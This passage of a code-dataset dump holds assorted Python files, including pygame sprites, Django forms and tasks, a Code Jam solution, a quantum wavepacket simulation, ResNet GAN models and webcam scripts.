\"\"\"Returns one pd.DataFrame per cycle type\"\"\"\n\n    # Features common for every cycle\n    cycles_cols = ['type', 'ambient_temperature', 'time']\n\n
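    # Note: impedance cycles expose a different field set than charge/discharge cycles do.\n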
    # Features monitored during the cycle\n    features_cols = {\n        'charge': ['Voltage_measured', 'Current_measured', 'Temperature_measured',\n                   'Current_charge', 'Voltage_charge', 'Time'],\n        'discharge': ['Voltage_measured', 'Current_measured', 'Temperature_measured',\n                      'Current_charge', 'Voltage_charge', 'Time', 'Capacity'],\n        'impedance': ['Sense_current', 'Battery_current', 'Current_ratio',\n                      'Battery_impedance', 'Rectified_impedance', 'Re', 'Rct']\n    }\n\n    # Define one pd.DataFrame per cycle type\n    df = {key: pd.DataFrame() for key in features_cols.keys()}\n\n    # Get every cycle\n    print(f'Number of cycles: {mat_db[0][0][0].shape[1]}')\n    cycles = [[row.flat[0] for row in line] for line in mat_db[0][0][0][0]]\n\n    # Get measures for every cycle\n    for cycle_id, cycle_data in enumerate(cycles):\n        tmp = pd.DataFrame()\n\n        # Data series for every cycle\n        features_x_cycle = cycle_data[-1]\n\n        # Get features for the specific cycle type\n        features = features_cols[cycle_data[0]]\n\n        for feature, data in zip(features, features_x_cycle):\n            if len(data[0]) > 1:\n                # Correct number of records\n                tmp[feature] = data[0]\n            else:\n                # Single value, so assign it to all rows\n                tmp[feature] = data[0][0]\n\n        # Add columns common to the cycle measurements\n        tmp['id_cycle'] = cycle_id\n        for k, col in enumerate(cycles_cols):\n            tmp[col] = cycle_data[k]\n\n        # Append cycle data to the right pd.DataFrame\n        cycle_type = cycle_data[0]\n        df[cycle_type] = df[cycle_type].append(tmp, ignore_index=True)\n\n    return df\n\n\n\ndfs = to_df(mat_data)\ndfs_charge = dfs['charge']\ndfs_discharge = dfs['discharge']\ndfs_impedance = dfs['impedance']\n\ndfs_charge.to_csv(mat_data_folder + battery_idx + '_charge.csv', index=False)\ndfs_discharge.to_csv(mat_data_folder + battery_idx + '_discharge.csv', index=False)\ndfs_impedance.to_csv(mat_data_folder + battery_idx + '_impedance.csv', index=False)\n\n\n","sub_path":"tmp/mat_csv.py","file_name":"mat_csv.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"641063754","text":"import pygame\r\nfrom pygame.sprite import Sprite\r\n\r\nclass Bullet(Sprite):\r\n\t''' Class for managing the bullets fired by the ship '''\r\n\tdef __init__(self, ai_settings, screen, ship, fire_x):\r\n\t\t''' Creates a bullet object at the ship's current position '''\r\n\t\t# Proper implementation of inheritance (???)\r\n\t\tsuper().__init__()\r\n\t\tself.screen = screen\r\n\t\tself.ai_settings = ai_settings\r\n\t\t# Load the bullet image and get its rect\r\n\t\tself.image = pygame.image.load('images/bullet.png')\r\n\t\tself.rect = self.image.get_rect()\r\n\t\t# Create a new bullet at the ship's current location\r\n\t\tself.rect.centerx = fire_x\r\n\t\tself.rect.top = ship.rect.top+1\r\n\t\t# Store the bullet's Y position as a float\r\n\t\tself.y = float(self.rect.y)\r\n\t\t# Speed of the bullet\r\n\t\tself.speed_factor = self.ai_settings.bullet_speed_factor\r\n\r\n\tdef update(self):\r\n\t\t''' Update the bullet's position on screen '''\r\n\t\tself.y -= self.speed_factor\r\n\t\t# Update the position of the rect\r\n\t\tself.rect.y = self.y\r\n\r\n\tdef blitme(self):\r\n\t\t''' Draw the bullet at its current position '''\r\n\t\tself.screen.blit(self.image, self.rect)","sub_path":"GAME/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"325736558","text":"t=int(input())\r\n
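# This appears to solve Code Jam 2016 Qualification \"Counting Sheep\": scan n, 2n, 3n, ... until every digit 0-9 has been seen; n == 0 never terminates (INSOMNIA).\r\n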
for i in range(t):\r\n\tn=int(input())\r\n\tdict={}\r\n\tp=0\r\n\ta=0\r\n\tc=1\r\n\tq=n\r\n\tif(n==0):\r\n\t\tprint(\"{0}{1}{2}{3}\".format('Case #',i+1,': ','INSOMNIA'))\r\n\t\tcontinue\r\n\telse:\r\n\t\twhile(True):\r\n\t\t\tb=q\r\n\t\t\twhile(b!=0):\r\n\t\t\t\ttemp=b%10\r\n\t\t\t\tif temp not in dict.keys():\r\n\t\t\t\t\tdict[temp]=''\r\n\t\t\t\t\tp+=1\r\n\t\t\t\t\tif(p==10):\r\n\t\t\t\t\t\tprint(\"{0}{1}{2}{3}\".format('Case #',i+1,': ',q))\r\n\t\t\t\t\t\ta=1\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tb=b//10\r\n\t\t\tif(a==1):\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tc+=1\r\n\t\t\t\tq=n*c\r\n\t\t\t\t\t\t\r\n\t\t\t\t\r\n\t\r\n\t\t\t\r\n","sub_path":"codes/CodeJamCrawler/16_0_1_neat/16_0_1_aman15jan_p1.py","file_name":"16_0_1_aman15jan_p1.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"112466198","text":"import random\nclass HashTable():\n\tdef __init__(self):\n\t\tself.data= ['None']*50  # 'None' strings mark empty slots\n\t\tself.addressList= []\n\t\tself.add = -1\n\n\tdef __str__(self):\n\t\treturn str(self.__dict__)\n\n\t# Python uses open addressing\n\tdef _hash(self):\n\t\tself.add +=1\n\t\treturn self.add\n\t\t# while True:\n\t\t# \tadd = random.randint(0,49)\n\t\t# \tif add not in self.addressList:\n\t\t# \t\treturn add\n\n\n\tdef set(self, keys, values):\n\t\taddress = self._hash()\n\t\tself.data[address] = [keys, values]\n\t\tself.addressList.append(address)\n\n\tdef get(self, keys):\n\t\tfor i in self.data:\n\t\t\t# skip slots that still hold the 'None' placeholder string\n\t\t\tif i == 'None':\n\t\t\t\tcontinue\n\t\t\tif i[0] == keys:\n\t\t\t\treturn i[1]\n\n\tdef keys(self):\n\t\tkey_list = []\n\t\tfor j in self.data:\n\t\t\tif j == 'None':\n\t\t\t\tcontinue\n\t\t\tkey_list.append(j[0])\n\t\treturn key_list\n\n\nhas = HashTable()\nhas.set('Vignesh', 1996)\nhas.set('Hector', 300)\nhas.set('Ajith', 1976)\nhas.set('Ajay', 1975)\nprint(has.get('Ajith'))\nprint(has.keys())\nprint(has)","sub_path":"Hash Tables/Hash Tables.py","file_name":"Hash Tables.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"144075530","text":"import pygame\r\nfrom pygame.sprite import Sprite\r\n\r\nclass Bullet(Sprite):\r\n    \"\"\"This class is useful for making bullets.\"\"\"\r\n    def __init__(self, tp_game):\r\n        super().__init__()\r\n        self.screen = tp_game.screen\r\n        self.settings = tp_game.settings\r\n        self.color = self.settings.bullet_color\r\n\r\n        self.rect = pygame.Rect(0, 0, self.settings.bullet_width, self.settings.bullet_height)\r\n        self.rect.midright = tp_game.ship.rect.midright\r\n\r\n        self.x = float(self.rect.x)\r\n\r\n    def update(self):\r\n        \"\"\"Move the bullet horizontally.\"\"\"\r\n        self.x += self.settings.bullet_speed\r\n\r\n        self.rect.x = self.x\r\n\r\n    def draw_bullet(self):\r\n        \"\"\"Draw the bullet on screen.\"\"\"\r\n        pygame.draw.rect(self.screen, self.color, self.rect)\r\n\r\n","sub_path":"TargetPractice/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"389029030","text":"import os\n\nimport cv2\nimport argparse\nimport chainer\nimport numpy as np\nimport timeit\nimport time\n\nfrom media_reader import VideoReader, get_filename_without_extension\nfrom pose_detector import PoseDetector, draw_person_pose\nfrom logging import basicConfig, getLogger, DEBUG\n\n#import cameras\n\nchainer.using_config('enable_backprop', False)\n\nif __name__ == '__main__':\n    basicConfig(level=DEBUG)\n    logger = getLogger(__name__)\n
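    # Only --gpu is exposed; --video stays commented out because frames are read from the webcam below.\n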
    parser = argparse.ArgumentParser(description='Pose detector')\n    #parser.add_argument('--video', type=str, default='', help='video file path')\n    parser.add_argument('--gpu', '-g', type=int, default=-1, help='GPU ID (negative value indicates CPU)')\n    args = parser.parse_args()\n\n    #if args.video == '':\n        #raise ValueError('Either --video has to be provided')\n\n    chainer.config.enable_backprop = False\n    chainer.config.train = False\n    \n    cap = cv2.VideoCapture(0)\n    cap.set(3,640)\n    cap.set(4,480)\n\n    # load model\n    pose_detector = PoseDetector(\"posenet\", \"models/coco_posenet.npz\", device=args.gpu)\n    cnt = 0\n    while True:\n\n        \n        ret, frame = cap.read()\n\n        # algorithm starting point\n        start_t = timeit.default_timer()\n        \n        if(cnt%3==0):\n            poses, _ = pose_detector(frame)\n            res_img = cv2.addWeighted(frame, 0.6, draw_person_pose(frame, poses), 0.4, 0)\n            logger.debug(\"type: {}\".format(type(poses)))\n            logger.debug(\"shape: {}\".format(poses.shape))\n            logger.debug(poses)\n        \n        #algorithm terminating point\n        terminate_t = timeit.default_timer()\n        FPS = int(1./(terminate_t - start_t ))\n\n        cv2.imshow('image',res_img)\n        print(FPS)\n        cnt = cnt + 1\n        k = cv2.waitKey(30) & 0xff\n        if k == 27: # exit when the Esc key is pressed\n            break\n        \n    ","sub_path":"RTPE.py","file_name":"RTPE.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"201176138","text":"import math\nimport pymssql\n\n\nclass LearningDB():\n\n    def __init__(self):\n        self.conn = pymssql.connect(host='127.0.0.1',\n                                    user='sa',\n                                    password='123456',\n                                    database='PyLearningDB',\n                                    charset='utf8')\n\n        self.cursor = self.conn.cursor()\n        self.sql = ''\n        self.distance = 0.0\n        self.conn.close()\n\n    def learn_data(self, table, dim):\n        '''\n        Learn data: store it into the corresponding table.\n        table selects which table to use; dim is the array of dimensions.\n        '''\n\n        learn_result = False\n\n        try:\n            if table < 0 or table > 9:\n                raise Exception(\"Error! table has value %d!\" % table)\n            for num in dim:\n                if num < 0:\n                    raise Exception(\"Error! dim values must not be less than 0!\")\n\n            self.conn = pymssql.connect(host='127.0.0.1',\n                                        user='sa',\n                                        password='123',\n                                        database='PyLearningDB',\n                                        charset='utf8')\n            self.cursor = self.conn.cursor()\n            self.sql = 'insert into table%d values(%d, %d, %d, %d, %d, %d, %d, %d, %d)' % (\n                table, dim[0], dim[1], dim[2], dim[3], dim[4], dim[5], dim[6], dim[7], dim[8])\n            self.cursor.execute(self.sql)\n            self.conn.commit()\n            learn_result = True\n        except Exception as ex_learn:\n            self.conn.rollback()\n            raise ex_learn\n        finally:\n            self.conn.close()\n            return learn_result\n\n    def identify_data(self, test_data):\n        '''\n        Identify data: compare it against every stored sample and return the closest match.\n        '''\n\n        try:\n            table_data = []\n            for i in range(10):\n                table_data.append(self.__get_data(i, test_data))\n\n            # return the index of the smallest value in table_data\n            return table_data.index(min(table_data))\n        except Exception as ex_identify:\n            raise ex_identify\n\n    def __get_data(self, table, test_data):\n        '''\n        Fetch all rows from the given table,\n        compare them with the test data, and return the smallest distance.\n        If the table is empty, treat it as a single all-zero row.\n        '''\n\n        try:\n            if table < 0 or table > 9:\n                raise Exception(\"Error! table must not have value %d!\" % table)\n            self.conn = pymssql.connect(host='127.0.0.1',\n                                        user='sa',\n                                        password='123',\n                                        database='PyLearningDB',\n                                        charset='utf8')\n            self.cursor = self.conn.cursor()\n            self.sql = 'select * from table%d' % table\n            self.cursor.execute(self.sql)\n            receive_sql = self.cursor.fetchall()\n\n            if not receive_sql:\n                new_receive_sql = [(0, 0, 0, 0, 0, 0, 0, 0, 0)]\n            else:\n                new_receive_sql = receive_sql\n        finally:\n            self.conn.close()\n        # compute the minimum distance\n        dim_data = []\n
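        # Nearest-sample match: the class whose stored row has the smallest 9-D distance wins.\n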
        for receive_data in new_receive_sql:\n            dim_data.append(self.__distance_data(test_data, receive_data))\n        # return the smallest value in dim_data\n        return min(dim_data)\n\n    def __distance_data(self, test_data, table_data):\n        '''\n        Euclidean distance between two points in 9-dimensional space\n        '''\n\n        self.distance = 0.0\n        for i in range(9):\n            self.distance += (test_data[i] - table_data[i]) ** 2\n        return math.sqrt(self.distance)\n","sub_path":"StudyingDB.py","file_name":"StudyingDB.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"519442370","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom server import app\n\nlayout = html.Div([\n\n    html.H1(children='Macro Dashboards',\n            style= {\n                'textAlign': 'center',\n                'padding-top': '30px',\n                'color': '#0064ad',\n                'font-weight': 'bold'\n            }),\n    dcc.Link(children=\n        html.Button('Sort by Data Type'),\n        href='/datatype',\n        style={\n            'display': 'flex',\n            'justify-content': 'center',\n            'margin-bottom': '30px',\n        }),\n    dcc.Link(children=\n        html.Button('Choose Country'),\n        href='/callback',\n        style={\n            'display': 'flex',\n            'justify-content': 'center',\n            'margin-bottom': '30px',\n        }),\n])","sub_path":"apps/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"41295125","text":"from config import celery_app\n\n# import django\nfrom django.conf import settings\nfrom django.template import Context\nfrom django.template import loader\nfrom django.core.mail import EmailMultiAlternatives\n\n# import project\nfrom accounts.models import User\n\n\n@celery_app.task\ndef send_email_alert_to_operator(template_url, subject, data={}):\n\n    # send an email alert when there is not at least one checking account and one credit account linked\n    emails = User.objects.filter(is_staff=True).values_list('email', flat=True)\n\n    template = loader.get_template(template_url)\n    context = Context(data)\n\n    html_content = template.render(context)\n\n    message = EmailMultiAlternatives(subject, '', settings.DEFAULT_FROM_EMAIL, emails)\n\n    message.attach_alternative(html_content, \"text/html\")\n\n    message.send()\n\n\n@celery_app.task\ndef send_email_alert_to_user(email, template_url, subject, context):\n    # send an email alert when there is not at least one checking account and one credit account linked\n    template = loader.get_template(template_url)\n\n    html_content = template.render(context)\n\n    message = EmailMultiAlternatives(subject, 'Email alert', settings.DEFAULT_FROM_EMAIL, [email])\n\n    message.attach_alternative(html_content, \"text/html\")\n\n    message.send()\n","sub_path":"debitize/debitize/commons/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"648690278","text":"from django import forms\nfrom django.forms.models import inlineformset_factory\n\nfrom .models import Contract, Payment\nfrom projects.models import Project\n\n\nclass ContractForm(forms.ModelForm):\n    shoot_location_is_same_as_billing_address = forms.BooleanField(required=False)\n\n    class Meta:\n        model = Contract\n        fields = ('client', 'shoot_location_is_same_as_billing_address', 'shoot_address',\n                  'shoot_city', 'shoot_zip_code', 'contract_number', 'contract_date', 'total_cost', 'payment_options')\n\n    def __init__(self, *args, **kwargs):\n        super(ContractForm, self).__init__(*args, **kwargs)\n        self.fields['client'].required = False\n\n    def clean_contract_number(self):\n        contract_number = 
self.cleaned_data.get('contract_number')\n        client = self.cleaned_data.get('client')\n\n        if client:\n            # check if contract number already exists in country\n            contract_number_exists = Contract.objects.filter(\n                contract_number=contract_number,\n                client__country=client.country\n            ).exists()\n\n            if contract_number_exists:\n                raise forms.ValidationError(u\"Contract number already exists in country %(country_name)s\" %\n                                            {'country_name': client.country.name}\n                                            )\n\n        return contract_number\n\n\nContractProjectsFormSet = inlineformset_factory(Contract, Project, fields=('product', 'notes'), extra=2,\n                                                 can_delete=False)\n\n\nclass UpdatePaymentForm(forms.ModelForm):\n    class Meta:\n        model = Payment\n        fields = ('amount', 'reference', 'contract', 'inputter')\n        widgets = {\n            'inputter': forms.HiddenInput(),\n            'contract': forms.HiddenInput()\n        }\n\n\nclass UpdateContractForm(forms.ModelForm):\n\n    class Meta:\n        model = Contract\n        fields = ('client', 'shoot_address',\n                  'shoot_city', 'shoot_zip_code', 'contract_number', 'contract_date', 'total_cost', 'payment_options')\n\n    def clean_contract_number(self):\n        contract_number = self.cleaned_data.get('contract_number')\n        client = self.cleaned_data.get(\"client\")\n        if contract_number != self.instance.contract_number:\n            # check if contract number already exists in country\n            contract_number_exists = Contract.objects.filter(\n                contract_number=contract_number,\n                client__country=client.country\n            ).exists()\n\n            if contract_number_exists:\n                raise forms.ValidationError(\n                    u\"Contract number already exists in country %(country_name)s\" %\n                    {'country_name': client.country.name}\n                )\n\n        return contract_number\n\n    def __init__(self, *args, **kwargs):\n        super(UpdateContractForm, self).__init__(*args, **kwargs)\n        self.fields['contract_date'].widget.attrs['class'] = 'form-control'","sub_path":"tracktool/contracts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"46993968","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 27 10:30:03 2019\r\n\r\n@author: dboyce5\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport scipy.linalg as la\r\nimport matplotlib.pyplot as plt\r\n#import scipy.special as sp\r\n\r\n#constants (natural units, hbar = m = 1)\r\nhbar = 1 #reduced Planck's constant\r\nL = 10 #length of x grid\r\nsigma = 2\r\np = 2 * np.pi\r\nm = 1\r\n\r\nN = 200 #number of cells; there should be N + 2 points, though\r\n\r\n#boundary points\r\na = -L\r\nb = L\r\n\r\n#stepping constant\r\ntau = 0.01\r\n\r\n#x grid (cell-edge)\r\nx,h = np.linspace(a, b,N,retstep = True,dtype=np.complex_)\r\n\r\n#potential (zero inside well)\r\nV = np.zeros_like(x,dtype=np.complex_)\r\n\r\nPsi = np.zeros_like(x,dtype=np.complex_)\r\nPsi = np.exp(1j * p * x / hbar) * np.exp(-x**2 / (2 * sigma**2)) / (np.sqrt(sigma * np.sqrt(np.pi)))\r\n#%%\r\n#define A and B matrices\r\nA = np.identity(N,dtype=np.complex_)\r\nB = np.identity(N,dtype=np.complex_)\r\nA[0,0] = 1\r\nA[-1,-1] = 1\r\nB[0,:] = 0\r\nB[-1,:] = 0\r\nfor n in range(1,N - 1):\r\n    A[n,n] = (1j * hbar / tau) - (hbar**2 / (2 * m * h**2)) - (V[n] / 2)\r\n    B[n,n] = (1j * hbar / tau) + (hbar**2 / (2 * m * h**2)) + (V[n] / 2)\r\n    A[n,n + 1] = hbar**2 / (4 * m * h**2)\r\n    A[n,n - 1] = hbar**2 / (4 * m * h**2)\r\n    B[n,n + 1] = -hbar**2 / (4 * m * h**2)\r\n    B[n,n - 1] = -hbar**2 / (4 * m * h**2)\r\n    \r\n    \r\n#matrix multiplication to get the rhs \r\nr = B @ Psi\r\n\r\n
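# Crank-Nicolson step: advance the wavefunction by solving the linear system A @ Psi_new = r, where r = B @ Psi carries the explicit half of the update.\r\n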
# load r[0] and r[-1] as appropriate\r\n# for the boundary conditions\r\nr[0] = 0\r\nr[-1] = 0\r\n\r\n# the new Psi from la.solve is loaded directly into Psi each step\r\n\r\n\r\nk = 0\r\nt = 0\r\ntmax = 15\r\nplt.figure(1) # Open the figure window\r\n# the loop that steps the solution along\r\n\r\nwhile t < tmax:\r\n    k = k + 1\r\n    t = t + tau\r\n    \r\n    Psi = la.solve(A,r)\r\n    PsiStar = np.conj(Psi)\r\n    PsiSq = np.real(PsiStar * Psi)\r\n    \r\n    integral = np.trapz(PsiSq,x,h)\r\n    \r\n    #matrix multiplication to get the rhs \r\n    r = B @ Psi\r\n\r\n    # load r[0] and r[-1] as appropriate\r\n    # for the boundary conditions\r\n    r[0] = 0\r\n    r[-1] = 0\r\n    \r\n    # Use leapfrog and the boundary conditions to load\r\n    # ynew with y at the next time step using y and yold\r\n    # update yold and y for next timestep\r\n    # remember to use np.copy\r\n    # make plots every 10 time steps\r\n    \r\n    #Texact = np.sin(np.pi * x / L) * np.exp(-np.pi**2 * D * t / L**2)\r\n    \r\n    #error = np.sqrt( np.mean( (T - Texact)**2 ))\r\n    \r\n    if k % 10 == 0:\r\n        plt.clf() # clear the figure window\r\n        #plt.plot(x,Texact,'b-')\r\n        plt.plot(x,np.real(Psi),'b-')\r\n        plt.plot(x,PsiSq,'r-')\r\n        plt.xlabel('x')\r\n        plt.ylabel('Psi')\r\n        plt.title('time = {:1.3f}, area under |Psi|**2 = {:1.6f}'.format(t,integral))\r\n        plt.ylim([-1,1])\r\n        plt.xlim([-L,L])\r\n        plt.draw() # Draw the plot\r\n        plt.pause(0.1) # Give the computer time to draw\r\n\r\n","sub_path":"Lab 08 -- Schrödinger's Equation/src/Problem 8-2b.py","file_name":"Problem 8-2b.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"116592530","text":"from django.urls import path\nfrom . import views,views1,model_view,views_vinay\nfrom django.conf.urls import url\nurlpatterns = [\n    url(r'^test', views.hello,name='test'),\n    url(r'^show', views.show, name='show'),\n    url(r'^index', views.index, name='index'),\n    url(r'^api', views1.index, name='index'),\n    url(r'^student', model_view.student_index, name='student_index'),\n    url(r'^Mobile', model_view.mobile_index, name='mobile_index'),\n    url(r'^vinayinfo', views_vinay.vinayinfo, name='vinayinfo'),\n    url(r'^emp', model_view.emp, name='emp'),\n\n\n\n\n\n    ]","sub_path":"djangoproject/djangoapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"487025725","text":"import math\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\n\r\n\r\ndef _upsample(x):\r\n    h, w = x.shape[2:]\r\n    return F.interpolate(x, size=(h * 2, w * 2))\r\n\r\n\r\ndef upsample_conv(x, conv):\r\n    return conv(_upsample(x))\r\n\r\n\r\nclass genBlock(nn.Module):\r\n    def __init__(self, in_channels, out_channels,\r\n                 activation=F.relu, hidden_channels=None, ksize=3, pad=1, upsample=False):\r\n        super(genBlock, self).__init__()\r\n        self.activation = activation\r\n        self.upsample = upsample\r\n        self.learnable_sc = in_channels != out_channels or upsample\r\n        hidden_channels = out_channels if hidden_channels is None else hidden_channels\r\n        self.c1 = nn.Conv2d(in_channels, hidden_channels, kernel_size=ksize, padding=pad)\r\n        nn.init.xavier_uniform_(self.c1.weight.data, math.sqrt(2))\r\n        self.c2 = nn.Conv2d(hidden_channels, out_channels, kernel_size=ksize, padding=pad)\r\n        nn.init.xavier_uniform_(self.c2.weight.data, math.sqrt(2))\r\n        self.b1 = nn.BatchNorm2d(in_channels)\r\n        self.b2 = nn.BatchNorm2d(hidden_channels)\r\n        if self.learnable_sc:\r\n            self.c_sc = nn.Conv2d(in_channels, out_channels, 
kernel_size=1, padding=0)\r\n            nn.init.xavier_uniform_(self.c_sc.weight.data)\r\n\r\n    def residual(self, x):\r\n        h = x\r\n        h = self.b1(h)\r\n        h = self.activation(h)\r\n        h = upsample_conv(h, self.c1) if self.upsample else self.c1(h)\r\n        h = self.b2(h)\r\n        h = self.activation(h)\r\n        h = self.c2(h)\r\n        return h\r\n\r\n    def shortcut(self, x):\r\n        if self.learnable_sc:\r\n            x = upsample_conv(x, self.c_sc) if self.upsample else self.c_sc(x)\r\n            return x\r\n        else:\r\n            return x\r\n\r\n    def forward(self, input):\r\n        return self.residual(input) + self.shortcut(input)\r\n\r\n\r\nclass ResNetGenerator(nn.Module):\r\n    def __init__(self, ch=256, dim_z=128, bottom_width=4, activation=F.relu, distribution=\"normal\"):\r\n        super(ResNetGenerator, self).__init__()\r\n        self.bottom_width = bottom_width\r\n        self.activation = activation\r\n        self.distribution = distribution\r\n        self.dim_z = dim_z\r\n        self.l1 = nn.Linear(dim_z, (bottom_width ** 2) * ch)\r\n        nn.init.xavier_uniform_(self.l1.weight.data)\r\n        self.block2 = genBlock(ch, ch, activation=activation, upsample=True)\r\n        self.block3 = genBlock(ch, ch, activation=activation, upsample=True)\r\n        self.block4 = genBlock(ch, ch, activation=activation, upsample=True)\r\n        self.b5 = nn.BatchNorm2d(ch)\r\n        self.c5 = nn.Conv2d(ch, 3, kernel_size=3, stride=1, padding=1)\r\n        nn.init.xavier_uniform_(self.c5.weight.data)\r\n        self.initial()\r\n\r\n    def initial(self):\r\n        def weights_init(m):\r\n            classname = m.__class__.__name__\r\n            if classname.find('Conv2d') != -1:\r\n                nn.init.constant_(m.bias.data, 0)\r\n            elif classname.find('Linear') != -1:\r\n                nn.init.constant_(m.bias.data, 0)\r\n            elif classname.find('BatchNorm') != -1:\r\n                nn.init.normal_(m.weight.data, 1.0, 0.02)\r\n                nn.init.constant_(m.bias.data, 0)\r\n\r\n        self.apply(weights_init)\r\n\r\n    def forward(self, input):\r\n        h = input\r\n        h0 = self.l1(h)\r\n        h = h0.view(h0.size(0), -1, self.bottom_width, self.bottom_width)\r\n        h = self.block2(h)\r\n        h = self.block3(h)\r\n        h = self.block4(h)\r\n        h = self.b5(h)\r\n        h = self.activation(h)\r\n        h = torch.tanh(self.c5(h))\r\n        return h\r\n\r\n\r\n# Homemade ResNet-50 style blocks; discriminator for the CIFAR-10 dataset, z_dim=128\r\ndef _downsample(input):\r\n    return F.avg_pool2d(input, 2)\r\n\r\n\r\nclass Dis_Bottleneck(nn.Module):\r\n    # the leading 1x1 and 3x3 convs use the same filter count; the final 1x1 conv has 'expansion' times as many\r\n    expansion = 4\r\n\r\n    def __init__(self, in_channels, out_channels, downsample=False, stride=1):\r\n        super(Dis_Bottleneck, self).__init__()\r\n        self.downsample = downsample\r\n        self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False)\r\n        self.bn1 = nn.BatchNorm2d(out_channels)\r\n        self.conv2 = nn.Conv2d(out_channels, out_channels, kernel_size=3,\r\n                               stride=stride, padding=1, bias=False)\r\n        self.bn2 = nn.BatchNorm2d(out_channels)\r\n        self.conv3 = nn.Conv2d(out_channels, self.expansion * out_channels,\r\n                               kernel_size=1, bias=False)\r\n        self.bn3 = nn.BatchNorm2d(self.expansion * out_channels)\r\n\r\n        self.shortcut = nn.Sequential()\r\n        if stride != 1 or in_channels != self.expansion * out_channels:\r\n            self.shortcut = nn.Sequential(\r\n                nn.Conv2d(in_channels, self.expansion * out_channels,\r\n                          kernel_size=1, stride=stride, bias=False),\r\n                nn.BatchNorm2d(self.expansion * out_channels)\r\n            )\r\n\r\n    def forward(self, x):\r\n        out = F.relu(self.bn1(self.conv1(x)))\r\n        out = F.relu(self.bn2(self.conv2(out)))\r\n        out = self.bn3(self.conv3(out))\r\n        out += self.shortcut(x)\r\n        out = F.relu(out)\r\n        if self.downsample:\r\n            out = _downsample(out)\r\n        return out\r\n\r\n\r\nclass ResNet_Discriminator(nn.Module):\r\n
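    # Bottleneck-stack discriminator: spatial sum-pooling feeds a single linear unit that outputs a raw logit.\r\n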
    def __init__(self, block, num_blocks, ch=128):\r\n        super(ResNet_Discriminator, self).__init__()\r\n        self.ch = ch\r\n\r\n        self.conv1 = nn.Conv2d(3, ch, kernel_size=3,\r\n                               stride=1, padding=1, bias=False)\r\n        self.bn1 = nn.BatchNorm2d(ch)\r\n        self.layer1 = self._make_layer(block, ch, num_blocks[0], downsample=True, stride=1)\r\n        self.layer2 = self._make_layer(block, ch, num_blocks[1], downsample=False, stride=2)\r\n        self.layer3 = self._make_layer(block, ch, num_blocks[2], downsample=False, stride=2)\r\n        self.layer4 = self._make_layer(block, ch, num_blocks[3], downsample=False, stride=2)\r\n        self.linear = nn.Linear(ch * block.expansion, 1)\r\n\r\n    def _make_layer(self, block, out_channels, num_blocks, downsample, stride):\r\n        strides = [stride] + [1] * (num_blocks - 1)\r\n        layers = []\r\n        for stride in strides:\r\n            layers.append(block(self.ch, out_channels, downsample, stride))\r\n            self.ch = out_channels * block.expansion\r\n        return nn.Sequential(*layers)\r\n\r\n    def forward(self, x):\r\n        out = F.relu(self.bn1(self.conv1(x)))\r\n        out = self.layer1(out)\r\n        out = self.layer2(out)\r\n        out = self.layer3(out)\r\n        out = self.layer4(out)\r\n        out = torch.sum(out, dim=(2, 3))\r\n        out = out.view(out.size(0), -1)\r\n        out = self.linear(out)\r\n        return out\r\n\r\n\r\ndef ResNetDiscriminator():\r\n    return ResNet_Discriminator(Dis_Bottleneck, [3, 4, 6, 3])\r\n\r\n#\r\n# def test():\r\n#     net = ResNetGenerator()\r\n#     y = net(torch.randn(128, 128))\r\n#     print(y)\r\n#\r\n#\r\n# #\r\n# #\r\n# test()\r\n# summary(ResNetGenerator(), (128, 128))\r\n","sub_path":"unsuccessful models/homemade_ResNet.py","file_name":"homemade_ResNet.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"80054160","text":"import os\r\nimport cv2 as cv\r\nimport time\r\n\r\ndef getdata():\r\n    ff = open(\"test.txt\", \"w\")\r\n    if not os.path.isdir(\"./image\"):\r\n        os.mkdir(\"./image\")\r\n    cap = cv.VideoCapture(0)\r\n    cap.set(cv.CAP_PROP_FRAME_WIDTH, 64), cap.set(cv.CAP_PROP_FRAME_HEIGHT, 48)\r\n    i = 0\r\n    while cap.isOpened():\r\n        print(\"the number is {}\".format((i) % 10+1))\r\n        time.sleep(1)\r\n        ret, frame = cap.read()\r\n        print(ret)\r\n        gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n        cv.imshow(\"frame\", gray)\r\n        if cv.waitKey(0) == ord('c'):\r\n            